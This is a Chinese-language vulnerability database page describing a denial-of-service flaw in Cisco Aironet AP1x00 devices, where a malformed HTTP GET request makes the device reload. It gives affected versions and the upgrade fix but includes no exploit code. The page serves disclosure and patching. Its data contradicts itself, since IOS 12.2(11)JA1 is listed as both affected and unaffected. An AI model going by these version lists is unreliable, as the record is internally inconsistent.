iD4DBQE/JUmbezGozzK2tZARArXRAKCIRsac6s3i7oRAEf4/2khQBKdEcgCXTsum
aQeEFDQLBhqS5wu0CarFkg==
=ehoq
-----END PGP SIGNATURE-----

    

- 漏洞信息

2309
Cisco Aironet HTTP GET DoS
Denial of Service
Loss of Availability

- 漏洞描述

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted URL is sent by an attacker, and will result in loss of availability for the device.

- 时间线

2003-07-03 2003-06-19
Unknow Unknow

- 解决方案

Upgrade to version indicated by Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8290
Yes No
2003-07-28 12:00:00 2009-07-11 10:56:00
This issue was discovered by Reda Zitouni.

- 受影响的程序版本

Cisco IOS 12.2(8)JA
Cisco IOS 12.2(4)JA1
Cisco IOS 12.2(4)JA
Cisco IOS 12.2(11)JA
Cisco IOS 12.2(11)JA1

- 不受影响的程序版本

Cisco IOS 12.2(11)JA1

- 漏洞讨论

Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload.

- 漏洞利用

There is no exploit required.

- 解决方案

Cisco has released updates to address this issue. Please see the attached advisory for details on obtaining and applying updates.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站